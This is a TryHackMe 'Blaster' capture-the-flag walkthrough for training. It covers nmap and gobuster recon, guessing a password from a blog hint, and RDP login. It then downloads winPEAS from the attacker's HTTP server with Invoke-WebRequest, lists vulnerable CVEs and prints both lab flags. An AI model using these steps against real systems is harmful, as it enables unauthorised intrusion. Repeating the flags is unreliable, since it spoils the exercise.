CTF-Writeups/TryHackMe/Blaster.md
2020-09-17 12:25:07 -04:00

9.3 KiB
Raw Blame History

TryHackMe-Blaster CTF

Abdullah Rizwan | 17th September , 06:19 PM

NMAP

export IP=10.10.74.61

Now we want to scan all ports that are open on the box so for this we are going to use -p- ports -A aggressive scan to look for all ports -T4 is the speed of the result and $IP is IP variable.

nmap -p- -A -T4 $IP
Host is up (0.22s latency).                                                                                                                         
Not shown: 65520 closed ports                                                                                                                       
PORT      STATE SERVICE       VERSION                                                                                                               
80/tcp    open  http          Microsoft IIS httpd 10.0                                                                                              
| http-methods:                                                                                                                                     
|_  Potentially risky methods: TRACE                                                                                                                
|_http-server-header: Microsoft-IIS/10.0                                                                                                            
|_http-title: IIS Windows Server                                                                                                                    
135/tcp   open  msrpc         Microsoft Windows RPC                                                                                                 
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn                                                                                         
445/tcp   open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3306/tcp  open  mysql         MySQL (unauthorized)                                                                                                  
3389/tcp  open  ms-wbt-server Microsoft Terminal Services                                                                                           
| rdp-ntlm-info:                                                                                                                                    
|   Target_Name: RETROWEB                                                                                                                           
|   NetBIOS_Domain_Name: RETROWEB                                                                                                                   
|   NetBIOS_Computer_Name: RETROWEB                                                                                                                 
|   DNS_Domain_Name: RetroWeb
|   DNS_Computer_Name: RetroWeb
|   Product_Version: 10.0.14393
|_  System_Time: 2020-09-17T13:37:30+00:00                                                                                                          
| ssl-cert: Subject: commonName=RetroWeb
| Not valid before: 2020-05-21T21:44:38
|_Not valid after:  2020-11-20T21:44:38                             
|_ssl-date: 2020-09-17T13:37:36+00:00; -1s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found                                                   
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found                                                   
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=9/17%OT=80%CT=1%CU=33259%PV=Y%DS=2%DC=T%G=Y%TM=5F6366A
OS:A)OPS(O1=M508NW8ST11%O2=M508NW8ST11%O3=M508NW8NNT11%O4=M508NW8ST11%O5=M5
OS:08NW8ST11%O6=M508ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=200
OS:0)ECN(R=Y%DF=Y%T=80%W=2000%O=M508NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S
OS:+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%
OS:T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%
OS:S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-09-17T13:37:29
|_  start_date: 2020-09-17T13:23:20

TRACEROUTE (using port 143/tcp)
HOP RTT       ADDRESS
1   175.30 ms 10.8.0.1
2   228.68 ms 10.10.74.61

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 786.80 seconds                                                                  

Web server is on http://10.10.74.61:80/

Gobuster

gobuster dir -u 10.10.74.61 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.74.61
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/09/17 09:45:48 Starting gobuster
===============================================================
/retro (Status: 301)
Progress: 7068 / 220561 (3.20%)
[!] Keyboard interrupt detected, terminating.
===============================================================
2020/09/17 09:50:04 Finished

By visiting the directory /retro we will find a username Wade.

By going through the page we will see a post

Ready Player One

by Wade

I cant believe the movie based on my favorite book of all time is going to come out in a few days! Maybe its because my name is so similar to the main character, but I honestly feel a deep connection to the main character Wade. I keep mistyping the name of his avatar whenever I log in but I think Ill eventually get it down. Either way, Im really excited to see this movie! 

Now by googling the name of the avatar we will find Parzival which is the passworrd for Wade.

Remmina (RDP)

Remmina is RDP client for linux

Simply launch the application and in the username insert wade in password parzival and you will be logged into windows machine.

THM{HACK_PLAYER_ONE}

Now that we have access to the machine we can run winPEAS on it to do that we first need to host it on our local machine

python -m SimpleHTTPServer                                                            
Serving HTTP on 0.0.0.0 port 8000 ...

Then open powershell on target machine since curl isn't available.

Invoke-WebRequest http://10.8.94.60:8000/winPEAS.exe -O winPEAS.exe

And run the file.

 [!] CVE-2019-0836 : VULNERABLE
        [>] https://exploit-db.com/exploits/46718
        [>] https://decoder.cloud/2019/04/29/combinig-luafv-postluafvpostreadwrite-race-condition-pe-with-diaghub-collector-exploit-from-standard-user-to-system/

       [!] CVE-2019-0841 : VULNERABLE
        [>] https://github.com/rogue-kdc/CVE-2019-0841
        [>] https://rastamouse.me/tags/cve-2019-0841/

       [!] CVE-2019-1064 : VULNERABLE
        [>] https://www.rythmstick.net/posts/cve-2019-1064/

       [!] CVE-2019-1130 : VULNERABLE
        [>] https://github.com/S3cur3Th1sSh1t/SharpByeBear

       [!] CVE-2019-1253 : VULNERABLE
        [>] https://github.com/padovah4ck/CVE-2019-1253

       [!] CVE-2019-1315 : VULNERABLE
        [>] https://offsec.almond.consulting/windows-error-reporting-arbitrary-file-move-eop.html

       [!] CVE-2019-1385 : VULNERABLE
        [>] https://www.youtube.com/watch?v=K6gHnr-VkAg

       [!] CVE-2019-1388 : VULNERABLE
        [>] https://github.com/jas502n/CVE-2019-1388

       [!] CVE-2019-1405 : VULNERABLE
        [>] https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/

You will see theses CVE's which are vulnerable to this machine for me internet explorer wasn't showing history so this method also works.

Previlege Esacalation

This is the video which helps to escalate our privileges.

https://www.youtube.com/watch?v=3BQKpPNlTSo

THM{COIN_OPERATED_EXPLOITATION}

This is the root flag.